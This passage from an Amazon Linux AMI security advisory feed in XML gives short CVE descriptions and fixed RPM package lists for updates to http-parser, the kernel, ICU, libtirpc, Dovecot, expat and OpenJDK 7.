The HTTP parser in all current versions of Node.js ignores spaces in the `Content-Length` header, allowing input such as `Content-Length: 1 2` to be interpreted as having a value of `12`. The HTTP specification does not allow for spaces in the `Content-Length` value and the Node.js HTTP parser has been brought into line on this particular difference. The security risk of this flaw to Node.js users is considered to be VERY LOW as it is difficult, and may be impossible, to craft an attack that makes use of this flaw in a way that could not already be achieved by supplying an incorrect value for `Content-Length`. Vulnerabilities may exist in user-code that make incorrect assumptions about the potential accuracy of this value compared to the actual length of the data supplied. Node.js users crafting lower-level HTTP utilities are advised to re-check the length of any input supplied after parsing is complete.
It was found that the http module from Node.js could accept incorrect Content-Length values, containing spaces within the value, in HTTP headers. A specially crafted client could use this flaw to possibly confuse the script, causing unspecified behavior.
99999:
CVE-2018-7159 nodejs: HTTP parser allowed for spaces inside Content-Length header values
1561981: CVE-2018-7159 nodejs: HTTP parser allowed for spaces inside Content-Length header values
CVE-2018-12121:
Node.js: All versions prior to Node.js 6.15.0, 8.14.0, 10.14.0 and 11.3.0: Denial of Service with large HTTP headers: By using a combination of many requests with maximum sized headers (almost 80 KB per connection), and carefully timed completion of the headers, it is possible to cause the HTTP server to abort from heap allocation failure. Attack potential is mitigated by the use of a load balancer or other proxy layer.
99999:
CVE-2018-12121 nodejs: Denial of Service with large HTTP headers
1661002: CVE-2018-12121 nodejs: Denial of Service with large HTTP headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12121" title="" id="CVE-2018-12121" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7159" title="" id="CVE-2018-7159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15605" title="" id="CVE-2019-15605" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="http-parser" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-debuginfo" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-debuginfo-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-devel" version="2.9.3" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/http-parser-devel-2.9.3-1.2.amzn1.x86_64.rpm</filename></package><package name="http-parser-debuginfo" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-debuginfo-2.9.3-1.2.amzn1.i686.rpm</filename></package><package name="http-parser-devel" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-devel-2.9.3-1.2.amzn1.i686.rpm</filename></package><package name="http-parser" version="2.9.3" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/http-parser-2.9.3-1.2.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1360</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1360: medium priority package update for kernel</title><issued date="2020-04-20 19:25:00" /><updated date="2023-11-29 23:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2020-8648:
A use-after-free flaw was found in the Linux kernel console driver when using the copy-paste buffer. This flaw allows a local user to crash the system.
CVE-2020-27418:
A Use After Free vulnerability in Fedora Linux kernel 5.9.0-rc9 allows attackers to obtain sensitive information via the vgacon_invert_region() function.
CVE-2020-2732:
A flaw was found in the way KVM hypervisor handled instruction emulation for the L2 guest when nested(=1) virtualization is enabled. In the instruction emulation, the L2 guest could trick the L0 hypervisor into accessing sensitive bits of the L1 hypervisor. An L2 guest could use this flaw to potentially access information of the L1 hypervisor.
CVE-2020-10942:
A stack buffer overflow issue was found in the get_raw_socket() routine of the Host kernel accelerator for virtio net (vhost-net) driver. It could occur while doing an ioctl(VHOST_NET_SET_BACKEND) call, and retrieving the socket name in a kernel stack variable via get_raw_socket(). A user able to perform ioctl(2) calls on the '/dev/vhost-net' device may use this flaw to crash the kernel, resulting in a DoS issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10942" title="" id="CVE-2020-10942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2732" title="" id="CVE-2020-2732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27418" title="" id="CVE-2020-27418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8648" title="" id="CVE-2020-8648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.173-106.229.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.173" 
release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.173-106.229.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.173" release="106.229.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.173-106.229.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1361</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1361: medium priority package update for icu</title><issued date="2020-04-20 20:34:00" /><updated date="2020-04-23 23:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10531:
An issue was discovered in International Components for Unicode (ICU) for C/C++ through 66.1. An integer overflow, leading to a heap-based buffer overflow, exists in the UnicodeString::doAppend() function in common/unistr.cpp.
1807349: CVE-2020-10531 ICU: Integer overflow in UnicodeString::doAppend()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10531" title="" id="CVE-2020-10531" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libicu" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="icu" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="libicu-doc" version="50.2" release="4.0.amzn1" epoch="0" arch="noarch"><filename>Packages/libicu-doc-50.2-4.0.amzn1.noarch.rpm</filename></package><package name="icu-debuginfo" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-debuginfo-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="libicu-devel" version="50.2" release="4.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-devel-50.2-4.0.amzn1.x86_64.rpm</filename></package><package name="icu-debuginfo" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/icu-debuginfo-50.2-4.0.amzn1.i686.rpm</filename></package><package name="libicu-devel" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-devel-50.2-4.0.amzn1.i686.rpm</filename></package><package name="libicu" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-50.2-4.0.amzn1.i686.rpm</filename></package><package name="icu" version="50.2" release="4.0.amzn1" epoch="0" arch="i686"><filename>Packages/icu-50.2-4.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1362</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1362: low priority package update for libtirpc</title><issued date="2020-04-20 20:38:00" /><updated date="2020-04-23 23:05:00" 
/><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14622:
A null-pointer dereference vulnerability was found in libtirpc before version 0.3.3-rc3. The return value of makefd_xprt() was not checked in all instances, which could lead to a crash when the server exhausted the maximum number of available file descriptors. A remote attacker could cause an rpc-based application to crash by flooding it with new connections.
1620293: CVE-2018-14622 libtirpc: Segmentation fault in makefd_xprt return value in svc_vc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14622" title="" id="CVE-2018-14622" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.4-0.16.15.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.4-0.16.15.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.4-0.16.15.amzn1.i686.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.16.15.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.4-0.16.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1363</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1363: medium priority package update for dovecot</title><issued date="2020-05-08 19:50:00" /><updated date="2020-05-14 02:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7524:
In Dovecot before 2.2.36.3 and 2.3.x before 2.3.5.1, a local attacker can cause a buffer overflow in the indexer-worker process, which can be used to elevate to root. This occurs because of missing checks in the fts and pop3-uidl components.
1696152: CVE-2019-7524 dovecot: Buffer overflow in indexer-worker process results in privilege escalation
CVE-2019-3814:
It was discovered that Dovecot before versions 2.2.36.1 and 2.3.4.1 incorrectly handled client certificates. A remote attacker in possession of a valid certificate with an empty username field could possibly use this issue to impersonate other users.
1673415: CVE-2019-3814 dovecot: Improper certificate validation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3814" title="" id="CVE-2019-3814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7524" title="" id="CVE-2019-7524" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-pigeonhole" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.2.36-6.19.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.19.amzn1" epoch="1" 
arch="i686"><filename>Packages/dovecot-pigeonhole-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.2.36-6.19.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.19.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-mysql-2.2.36-6.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1364</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1364: medium priority package update for expat</title><issued date="2020-05-11 20:41:00" /><updated date="2020-05-14 02:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2716:
Buffer overflow in the XML parser in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code by providing a large amount of compressed XML data, a related issue to CVE-2015-1283.
99999:
CVE-2015-2716 expat: Integer overflow leading to buffer overflow in XML_GetBuffer()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2716" title="" id="CVE-2015-2716" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="11.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-11.22.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-11.22.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-11.22.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="11.22.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-11.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1365</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1365: important priority package update for java-1.7.0-openjdk</title><issued date="2020-05-08 20:10:00" /><updated date="2020-05-14 02:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2830:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2830 OpenJDK: Regular expression DoS in Scanner (Concurrency, 8236201)
1823542: CVE-2020-2830 OpenJDK: Regular expression DoS in Scanner (Concurrency, 8236201)
CVE-2020-2805:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
No description is available for this CVE.
99999:
CVE-2020-2805 OpenJDK: Incorrect type checks in MethodType.readObject() (Libraries, 8235274)
1823844: CVE-2020-2805 OpenJDK: Incorrect type checks in MethodType.readObject() (Libraries, 8235274)
CVE-2020-2803:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
A flaw was found in the boundary checks in the java.nio buffer classes in the Libraries component of OpenJDK, where it is bypassed in certain cases. This flaw allows an untrusted Java application or applet to bypass Java sandbox restrictions.
99999:
CVE-2020-2803 OpenJDK: Incorrect bounds checks in NIO Buffers (Libraries, 8234841)
1823694: CVE-2020-2803 OpenJDK: Incorrect bounds checks in NIO Buffers (Libraries, 8234841)
CVE-2020-2800:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
No description is available for this CVE.
99999:
CVE-2020-2800 OpenJDK: CRLF injection into HTTP headers in HttpServer (Lightweight HTTP Server, 8234825)
1823527: CVE-2020-2800 OpenJDK: CRLF injection into HTTP headers in HttpServer (Lightweight HTTP Server, 8234825)
CVE-2020-2781:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2781 OpenJDK: Re-use of single TLS sessions for new connections (JSSE, 8234408)
1823960: CVE-2020-2781 OpenJDK: Re-use of single TLS session for new connections (JSSE, 8234408)
CVE-2020-2773:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2773 OpenJDK: Unexpected exceptions raised by DOMKeyInfoFactory and DOMXMLSignatureFactory (Security, 8231415)
1823224: CVE-2020-2773 OpenJDK: Unexpected exceptions raised by DOMKeyInfoFactory and DOMXMLSignatureFactory (Security, 8231415)
CVE-2020-2757:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2757 OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)
1823216: CVE-2020-2757 OpenJDK: Uncaught InstantiationError exception in ObjectStreamClass (Serialization, 8224549)
CVE-2020-2756:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2020-2756 OpenJDK: Incorrect handling of references to uninitialized class descriptors during deserialization (Serialization, 8224541)
1823215: CVE-2020-2756 OpenJDK: Incorrect handling of references to uninitialized class descriptors during deserialization (Serialization, 8224541)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2756" title="" id="CVE-2020-2756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2757" title="" id="CVE-2020-2757" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2773" title="" id="CVE-2020-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2781" title="" id="CVE-2020-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2800" title="" id="CVE-2020-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2803" title="" id="CVE-2020-2803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2805" title="" id="CVE-2020-2805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2830" title="" id="CVE-2020-2830" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" 
